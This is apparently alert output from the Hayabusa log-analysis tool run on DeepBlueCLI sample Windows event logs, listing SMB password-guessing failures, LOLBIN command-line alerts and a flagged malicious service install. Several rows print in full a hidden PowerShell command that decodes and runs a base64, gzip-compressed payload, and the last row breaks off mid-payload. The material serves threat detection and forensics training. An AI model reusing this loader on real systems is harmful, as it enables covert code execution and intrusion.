2016-09-20 01:52:48.485 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LmuAXUwSkhR3tSRg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:48.535 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Zy4Fkpvcrlmp9AES | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:48.572 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 51ipUXvrRh0CPH1e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:48.670 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5TB15XKzVJwIyjqU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:48.713 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i1F6muFPBlPyHPbR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:48.752 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XNXwYS73RElHozUo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:48.793 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ft1MLPJISeq0bMsa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:48.845 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i8kbFOwQiCyRVMDV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:48.879 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ToPzuDEmXN1fjIcS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:48.924 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pKF1QKEuTXIGnrx2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:48.964 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fyHpo6pX8TEo6ttv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:49.000 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3uYqEt90yr8B3rK9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:49.048 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2LKkrM0slVn0CKHw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:49.080 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TyJ82cfaddnc8c6D | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:49.120 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KJRw0S82SupmuS4Y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:49.161 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: z4lSo9BMWdcPLfLb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:49.208 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XreSLg472qhJw0R3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:49.266 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KIJcQJKLmnjrE2T9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:49.309 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zlddo3GCTEIkFyi9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:49.359 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hxiZoB5mHR2tGUFM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:49.399 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fpEbpiox2Q3Qf8av | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:54:20.959 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x438 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 01:55:28.022 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x338 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 01:55:39.187 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x658 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 02:43:48.712 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\8xpeyiyp.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xbf4 | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 02:43:48.834 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\ud-vxj7k.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0x840 | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 02:43:49.017 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\gsxogihi.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0x2f8 | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 02:43:49.106 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\owummvtl.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xe48 | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 02:43:49.183 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe /d acproxy.dll,PerformAutochkOperations | Path: C:\Windows\System32\rundll32.exe | PID: 0xe8c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 02:43:49.891 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\PING.EXE"" ""Local CMOS Clock"" /n 2 | Path: C:\Windows\System32\PING.EXE | PID: 0xfb0 | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 02:43:49.912 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\PING.EXE"" time.windows.com /n 2 | Path: C:\Windows\System32\PING.EXE | PID: 0x184 | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 05:36:09.147 +09:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,"Svc: zIGuwymOgHZnXZPm | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIADhM4FcCA7VWbW/aSBD+nEr9D1aFhK0QbAhtmkiVbm1ew0sABwhQVG3stVlYex17zVuv//3GgBt6Te7ak85KxK5nZvfZZ57ZsRP7lqDcl4K7JpK+vn1z1sUh9iQ54w7q7PbLIidl1p62iJWzMzBm5pVF8XZXiQfSJ0meoiAocw9Tf3ZzY8RhSHxxmOdrRKAoIt4joySSFelPaTQnIbm4e1wQS0hfpcyXfI3xR8yOblsDW3MiXSDfTmwtbuEEV94MGBVy9vPnrDK9KMzylacYs0jOmttIEC9vM5ZVpG9KsuH9NiBytk2tkEfcEfkR9S+L+YEfYYd0YLUVaRMx53aUVeAo8BcSEYe+9HyoZJWDj5yFYTfkFrLtkEQQkm/4K74kcsaPGctJf8jTI4R+7AvqEbALEvLAJOGKWiTK17FvM9InzkzukHV68l8Nkk+DwKsrQiUHaXkNa5vbMSOH8KzyM9o0nwo833MKPHx7++btGydVAQ4871QFMDqb7scEcMpdHtG93ydJy0lt2AwLHm5hmrkPY6LMpGmShOlsJmWCUjv3engh9QVPYneDDbybDjm1ZxBzTE/maT4ePyyjxPS60srEoT4pb33sUSsVk/wS5cRhZH/MfOrWAWBy9mggdpkw4mKR8JeTpj+HVTwqvsfqMWU2CZEFaYsAFWRU+RHMISVytuG3iQc0HeZZYN8BCZPU+yjbbbp7MgenrMFwFOWkbgw1ZOUkk2BG7JyE/IgeTSgWfD/MPsNtx0xQC0ciXW6mnFB53NLgfiTC2ILkwfHvzYBYFLOEjZxUpzbRtyZ1062zL3JhYMao78JKK8gFvEk4MEUiiRBQJulX8iYRDS9gxAOXfTlXGXaheI/q30sIu8TOvoAx1fZByAkhKRMnCCHLJuMiJw1pKOBiSMjdy+k/ITi5ElIsRkiOKZHTYpnqW5FIPLPQ2h+HYb9hrC4TiR452jMSCmCjGnJPxxH5UDJFCFzJ79Q7aiB4xg2ftS19SQtoTQuNNvwP6GWDl6/s5u2iroblzdxBjajRrnfLvXq9tLo1hyVhVhqi2W2IduVhsTBRvT8Yi0kD1e+pthyXdsEt3ZktZI836oedvltr+ma3cG1nXHYc98ox+4X3VdoaGT1dK+JWuRK3Rvpa10pRha7rPTroLW+r4nE8ZHjgqO5D4RrTTStcDAu8vWsgVJtfWrtbZ1ibt+3tuK5ej0pLVEHI8CvDqs6bYz1EXXWI3SFfNxc1NnINpI/OKZn0BlW916vqaFBbPJWvVRdiH/BcHw2LdBI89OcwrwKEpqqVGjbZ8XEPSKpxhN0++LhG0Zo74FM+R/p5h0dFvNQ50sGnOnkCXOOg2mVgvx8UORqyzgNGrcm2qqqFcbeE6hod1VyULIldvYdRtCrvymphaHN79L4zdtThA7tSy8Z9YDmqqq7r5aY1KWw+3l2VdO3J8KjHHou2ej34qPvrpttduXZvdNXfdLaPsN9AVYfvEvWAfDIu89Zm9f7uy3ZyIonXLvs2DqM5ZiAVuMDTeq3ysHq8jrucJhGyvG/OSxL6hEFHg56X6h0xxq2kL+wvbuhJh04xg5IdwPCy+OJIkb47Ks+tIn11czMBlFBAJ/rOt4jvinlO21xqGlz92qakwZl//YAGD7by6Yq5pIOc8vW3Ddl+QyUpuExgfcBGfL34fyk9lvocfux/o/T53T9Yf4lmLfcDCT9Zf3zxW5z/NgMjTAV4mnBXMXJoni8TcZTRyWdGmiJQiHN8ko++u1hcdOAL5C8TptLHZwoAAA==''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-20 05:36:09.147 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,"Svc: zIGuwymOgHZnXZPm | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIADhM4FcCA7VWbW/aSBD+nEr9D1aFhK0QbAhtmkiVbm1ew0sABwhQVG3stVlYex17zVuv//3GgBt6Te7ak85KxK5nZvfZZ57ZsRP7lqDcl4K7JpK+vn1z1sUh9iQ54w7q7PbLIidl1p62iJWzMzBm5pVF8XZXiQfSJ0meoiAocw9Tf3ZzY8RhSHxxmOdrRKAoIt4joySSFelPaTQnIbm4e1wQS0hfpcyXfI3xR8yOblsDW3MiXSDfTmwtbuEEV94MGBVy9vPnrDK9KMzylacYs0jOmttIEC9vM5ZVpG9KsuH9NiBytk2tkEfcEfkR9S+L+YEfYYd0YLUVaRMx53aUVeAo8BcSEYe+9HyoZJWDj5yFYTfkFrLtkEQQkm/4K74kcsaPGctJf8jTI4R+7AvqEbALEvLAJOGKWiTK17FvM9InzkzukHV68l8Nkk+DwKsrQiUHaXkNa5vbMSOH8KzyM9o0nwo833MKPHx7++btGydVAQ4871QFMDqb7scEcMpdHtG93ydJy0lt2AwLHm5hmrkPY6LMpGmShOlsJmWCUjv3engh9QVPYneDDbybDjm1ZxBzTE/maT4ePyyjxPS60srEoT4pb33sUSsVk/wS5cRhZH/MfOrWAWBy9mggdpkw4mKR8JeTpj+HVTwqvsfqMWU2CZEFaYsAFWRU+RHMISVytuG3iQc0HeZZYN8BCZPU+yjbbbp7MgenrMFwFOWkbgw1ZOUkk2BG7JyE/IgeTSgWfD/MPsNtx0xQC0ciXW6mnFB53NLgfiTC2ILkwfHvzYBYFLOEjZxUpzbRtyZ1062zL3JhYMao78JKK8gFvEk4MEUiiRBQJulX8iYRDS9gxAOXfTlXGXaheI/q30sIu8TOvoAx1fZByAkhKRMnCCHLJuMiJw1pKOBiSMjdy+k/ITi5ElIsRkiOKZHTYpnqW5FIPLPQ2h+HYb9hrC4TiR452jMSCmCjGnJPxxH5UDJFCFzJ79Q7aiB4xg2ftS19SQtoTQuNNvwP6GWDl6/s5u2iroblzdxBjajRrnfLvXq9tLo1hyVhVhqi2W2IduVhsTBRvT8Yi0kD1e+pthyXdsEt3ZktZI836oedvltr+ma3cG1nXHYc98ox+4X3VdoaGT1dK+JWuRK3Rvpa10pRha7rPTroLW+r4nE8ZHjgqO5D4RrTTStcDAu8vWsgVJtfWrtbZ1ibt+3tuK5ej0pLVEHI8CvDqs6bYz1EXXWI3SFfNxc1NnINpI/OKZn0BlW916vqaFBbPJWvVRdiH/BcHw2LdBI89OcwrwKEpqqVGjbZ8XEPSKpxhN0++LhG0Zo74FM+R/p5h0dFvNQ50sGnOnkCXOOg2mVgvx8UORqyzgNGrcm2qqqFcbeE6hod1VyULIldvYdRtCrvymphaHN79L4zdtThA7tSy8Z9YDmqqq7r5aY1KWw+3l2VdO3J8KjHHou2ej34qPvrpttduXZvdNXfdLaPsN9AVYfvEvWAfDIu89Zm9f7uy3ZyIonXLvs2DqM5ZiAVuMDTeq3ysHq8jrucJhGyvG/OSxL6hEFHg56X6h0xxq2kL+wvbuhJh04xg5IdwPCy+OJIkb47Ks+tIn11czMBlFBAJ/rOt4jvinlO21xqGlz92qakwZl//YAGD7by6Yq5pIOc8vW3Ddl+QyUpuExgfcBGfL34fyk9lvocfux/o/T53T9Yf4lmLfcDCT9Zf3zxW5z/NgMjTAV4mnBXMXJoni8TcZTRyWdGmiJQiHN8ko++u1hcdOAL5C8TptLHZwoAAA==''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-20 05:36:09.147 +09:00,IE10Win7,7045,info,,New Service Installed,"Name: zIGuwymOgHZnXZPm | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIADhM4FcCA7VWbW/aSBD+nEr9D1aFhK0QbAhtmkiVbm1ew0sABwhQVG3stVlYex17zVuv//3GgBt6Te7ak85KxK5nZvfZZ57ZsRP7lqDcl4K7JpK+vn1z1sUh9iQ54w7q7PbLIidl1p62iJWzMzBm5pVF8XZXiQfSJ0meoiAocw9Tf3ZzY8RhSHxxmOdrRKAoIt4joySSFelPaTQnIbm4e1wQS0hfpcyXfI3xR8yOblsDW3MiXSDfTmwtbuEEV94MGBVy9vPnrDK9KMzylacYs0jOmttIEC9vM5ZVpG9KsuH9NiBytk2tkEfcEfkR9S+L+YEfYYd0YLUVaRMx53aUVeAo8BcSEYe+9HyoZJWDj5yFYTfkFrLtkEQQkm/4K74kcsaPGctJf8jTI4R+7AvqEbALEvLAJOGKWiTK17FvM9InzkzukHV68l8Nkk+DwKsrQiUHaXkNa5vbMSOH8KzyM9o0nwo833MKPHx7++btGydVAQ4871QFMDqb7scEcMpdHtG93ydJy0lt2AwLHm5hmrkPY6LMpGmShOlsJmWCUjv3engh9QVPYneDDbybDjm1ZxBzTE/maT4ePyyjxPS60srEoT4pb33sUSsVk/wS5cRhZH/MfOrWAWBy9mggdpkw4mKR8JeTpj+HVTwqvsfqMWU2CZEFaYsAFWRU+RHMISVytuG3iQc0HeZZYN8BCZPU+yjbbbp7MgenrMFwFOWkbgw1ZOUkk2BG7JyE/IgeTSgWfD/MPsNtx0xQC0ciXW6mnFB53NLgfiTC2ILkwfHvzYBYFLOEjZxUpzbRtyZ1062zL3JhYMao78JKK8gFvEk4MEUiiRBQJulX8iYRDS9gxAOXfTlXGXaheI/q30sIu8TOvoAx1fZByAkhKRMnCCHLJuMiJw1pKOBiSMjdy+k/ITi5ElIsRkiOKZHTYpnqW5FIPLPQ2h+HYb9hrC4TiR452jMSCmCjGnJPxxH5UDJFCFzJ79Q7aiB4xg2ftS19SQtoTQuNNvwP6GWDl6/s5u2iroblzdxBjajRrnfLvXq9tLo1hyVhVhqi2W2IduVhsTBRvT8Yi0kD1e+pthyXdsEt3ZktZI836oedvltr+ma3cG1nXHYc98ox+4X3VdoaGT1dK+JWuRK3Rvpa10pRha7rPTroLW+r4nE8ZHjgqO5D4RrTTStcDAu8vWsgVJtfWrtbZ1ibt+3tuK5ej0pLVEHI8CvDqs6bYz1EXXWI3SFfNxc1NnINpI/OKZn0BlW916vqaFBbPJWvVRdiH/BcHw2LdBI89OcwrwKEpqqVGjbZ8XEPSKpxhN0++LhG0Zo74FM+R/p5h0dFvNQ50sGnOnkCXOOg2mVgvx8UORqyzgNGrcm2qqqFcbeE6hod1VyULIldvYdRtCrvymphaHN79L4zdtThA7tSy8Z9YDmqqq7r5aY1KWw+3l2VdO3J8KjHHou2ej34qPvrpttduXZvdNXfdLaPsN9AVYfvEvWAfDIu89Zm9f7uy3ZyIonXLvs2DqM5ZiAVuMDTeq3ysHq8jrucJhGyvG/OSxL6hEFHg56X6h0xxq2kL+wvbuhJh04xg5IdwPCy+OJIkb47Ks+tIn11czMBlFBAJ/rOt4jvinlO21xqGlz92qakwZl//YAGD7by6Yq5pIOc8vW3Ddl+QyUpuExgfcBGfL34fyk9lvocfux/o/T53T9Yf4lmLfcDCT9Zf3zxW5z/NgMjTAV4mnBXMXJoni8TcZTRyWdGmiJQiHN8ko++u1hcdOAL5C8TptLHZwoAAA==''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-20 05:36:09.237 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIADhM4FcCA7VWbW/aSBD+nEr9D1aFhK0QbAhtmkiVbm1ew0sABwhQVG3stVlYex17zVuv//3GgBt6Te7ak85KxK5nZvfZZ57ZsRP7lqDcl4K7JpK+vn1z1sUh9iQ54w7q7PbLIidl1p62iJWzMzBm5pVF8XZXiQfSJ0meoiAocw9Tf3ZzY8RhSHxxmOdrRKAoIt4joySSFelPaTQnIbm4e1wQS0hfpcyXfI3xR8yOblsDW3MiXSDfTmwtbuEEV94MGBVy9vPnrDK9KMzylacYs0jOmttIEC9vM5ZVpG9KsuH9NiBytk2tkEfcEfkR9S+L+YEfYYd0YLUVaRMx53aUVeAo8BcSEYe+9HyoZJWDj5yFYTfkFrLtkEQQkm/4K74kcsaPGctJf8jTI4R+7AvqEbALEvLAJOGKWiTK17FvM9InzkzukHV68l8Nkk+DwKsrQiUHaXkNa5vbMSOH8KzyM9o0nwo833MKPHx7++btGydVAQ4871QFMDqb7scEcMpdHtG93ydJy0lt2AwLHm5hmrkPY6LMpGmShOlsJmWCUjv3engh9QVPYneDDbybDjm1ZxBzTE/maT4ePyyjxPS60srEoT4pb33sUSsVk/wS5cRhZH/MfOrWAWBy9mggdpkw4mKR8JeTpj+HVTwqvsfqMWU2CZEFaYsAFWRU+RHMISVytuG3iQc0HeZZYN8BCZPU+yjbbbp7MgenrMFwFOWkbgw1ZOUkk2BG7JyE/IgeTSgWfD/MPsNtx0xQC0ciXW6mnFB53NLgfiTC2ILkwfHvzYBYFLOEjZxUpzbRtyZ1062zL3JhYMao78JKK8gFvEk4MEUiiRBQJulX8iYRDS9gxAOXfTlXGXaheI/q30sIu8TOvoAx1fZByAkhKRMnCCHLJuMiJw1pKOBiSMjdy+k/ITi5ElIsRkiOKZHTYpnqW5FIPLPQ2h+HYb9hrC4TiR452jMSCmCjGnJPxxH5UDJFCFzJ79Q7aiB4xg2ftS19SQtoTQuNNvwP6GWDl6/s5u2iroblzdxBjajRrnfLvXq9tLo1hyVhVhqi2W2IduVhsTBRvT8Yi0kD1e+pthyXdsEt3ZktZI836oedvltr+ma3cG1nXHYc98ox+4X3VdoaGT1dK+JWuRK3Rvpa10pRha7rPTroLW+r4nE8ZHjgqO5D4RrTTStcDAu8vWsgVJtfWrtbZ1ibt+3tuK5ej0pLVEHI8CvDqs6bYz1EXXWI3SFfNxc1NnINpI/OKZn0BlW916vqaFBbPJWvVRd